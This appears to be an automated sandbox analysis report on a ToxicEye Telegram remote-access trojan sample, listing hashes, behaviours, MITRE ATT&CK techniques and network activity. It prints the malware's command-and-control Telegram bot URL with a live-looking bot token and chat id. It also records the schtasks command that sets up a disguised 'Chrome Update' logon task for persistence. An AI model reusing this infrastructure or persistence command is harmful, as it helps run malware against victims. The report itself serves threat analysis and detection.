toxiceye | aa85fb55d123c655e9e54517a21660085cc6518626d1a2e484f67d28c3f828a1

Reason

Machine shutdown

General

Target

TelegramRAT.exe
Size

119KB
MD5

39961917429b1031a294302cc7a40b0e
SHA1

529b27132bbc146fbdcb1d1c8ad9207b5cd1c2d2
SHA256

aa85fb55d123c655e9e54517a21660085cc6518626d1a2e484f67d28c3f828a1
SHA512

754d6a5fd1382b34891fbd0bcc5e2108023eb52cad9996cc8a332f4fb6251a3ba508767b074de0481b0b9a2ac68fe0605d98934dbfd7eaba5cbbc5a940550a46
SSDEEP

3072:CIfRzlXCwwFwOwWAmm+m/bxqH8QWqzCrAZuudL:CN1SWH+/bgR

Score

10^/10

toxiceye discovery rat trojan

Malware Config

Extracted

Family

toxiceye

C2

https://api.telegram.org/bot7742822790:AAHkizf3bilCkIqp8NNVcbWObKSVKo8Xifo/sendMessage?chat_id=7053620590

Signatures

ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye
Toxiceye family
toxiceye

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	TelegramRAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	rat.exe

Executes dropped EXE 1 IoCs

pid	Process
1380	rat.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
1928	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3904	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4276	schtasks.exe
4200	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1380	rat.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1380	rat.exe
1380	rat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1520	TelegramRAT.exe
Token: SeDebugPrivilege	1928	tasklist.exe
Token: SeDebugPrivilege	1380	rat.exe
Token: SeDebugPrivilege	1380	rat.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1380	rat.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1520 wrote to memory of 4276	1520	TelegramRAT.exe	85
PID 1520 wrote to memory of 4276	1520	TelegramRAT.exe	85
PID 1520 wrote to memory of 4224	1520	TelegramRAT.exe	87
PID 1520 wrote to memory of 4224	1520	TelegramRAT.exe	87
PID 4224 wrote to memory of 1928	4224	cmd.exe	89
PID 4224 wrote to memory of 1928	4224	cmd.exe	89
PID 4224 wrote to memory of 1608	4224	cmd.exe	90
PID 4224 wrote to memory of 1608	4224	cmd.exe	90
PID 4224 wrote to memory of 3904	4224	cmd.exe	91
PID 4224 wrote to memory of 3904	4224	cmd.exe	91
PID 4224 wrote to memory of 1380	4224	cmd.exe	92
PID 4224 wrote to memory of 1380	4224	cmd.exe	92
PID 1380 wrote to memory of 4200	1380	rat.exe	94
PID 1380 wrote to memory of 4200	1380	rat.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB46B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB46B.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 1520"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:1608
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3904
- - C:\Users\ToxicEye\rat.exe
    "rat.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4200

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

45.89.16.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.89.16.2.in-addr.arpa

IN PTR

Response

45.89.16.2.in-addr.arpa

IN PTR

a2-16-89-45deploystaticakamaitechnologiescom
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

google.com

rat.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
DNS

api.telegram.org

rat.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot7742822790:AAHkizf3bilCkIqp8NNVcbWObKSVKo8Xifo/sendMessage?chat_id=7053620590&text=%F0%9F%8D%80%20Bot%20connected

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot7742822790:AAHkizf3bilCkIqp8NNVcbWObKSVKo8Xifo/sendMessage?chat_id=7053620590&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Server: nginx/1.18.0
Date: Sun, 05 Jan 2025 13:29:28 GMT
Content-Type: application/json
Content-Length: 56
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

149.154.167.220:443

https://api.telegram.org/bot7742822790:AAHkizf3bilCkIqp8NNVcbWObKSVKo8Xifo/sendMessage?chat_id=7053620590&text=%F0%9F%8D%80%20Bot%20connected

tls, http

rat.exe

884 B
6.6kB
9
10

HTTP Request

GET https://api.telegram.org/bot7742822790:AAHkizf3bilCkIqp8NNVcbWObKSVKo8Xifo/sendMessage?chat_id=7053620590&text=%F0%9F%8D%80%20Bot%20connected

HTTP Response

400

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

45.89.16.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

45.89.16.2.in-addr.arpa
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

136.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

google.com

dns

rat.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.180.14
8.8.8.8:53

api.telegram.org

dns

rat.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Process Discovery

Query Registry

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpB46B.tmp.bat

Filesize
188B

MD5
e94364f53d480e6aa0e7beb0323f3538

SHA1
c993d7ce9b662c5f4a1dc048e4a4e43689314213

SHA256
ccdec5b3a2f08be2b6343486c0022db22df745bd5eecbb35cc1e0705a6a77dc7

SHA512
72f1317813c048f70af92f6616494a30caa3748af7543432940e78c7f3d44037694d9c57a1ac77456abee6901f66a124d61c95e94ae7f9833cab8b02079fabeb

Download Submit
C:\Users\ToxicEye\rat.exe

Filesize
119KB

MD5
39961917429b1031a294302cc7a40b0e

SHA1
529b27132bbc146fbdcb1d1c8ad9207b5cd1c2d2

SHA256
aa85fb55d123c655e9e54517a21660085cc6518626d1a2e484f67d28c3f828a1

SHA512
754d6a5fd1382b34891fbd0bcc5e2108023eb52cad9996cc8a332f4fb6251a3ba508767b074de0481b0b9a2ac68fe0605d98934dbfd7eaba5cbbc5a940550a46

Download Submit
memory/1520-0-0x00007FF940393000-0x00007FF940395000-memory.dmp

Filesize
8KB

Download
memory/1520-1-0x00000191EE2F0000-0x00000191EE314000-memory.dmp

Filesize
144KB

Download
memory/1520-2-0x00007FF940390000-0x00007FF940E51000-memory.dmp

Filesize
10.8MB

Download
memory/1520-6-0x00007FF940390000-0x00007FF940E51000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.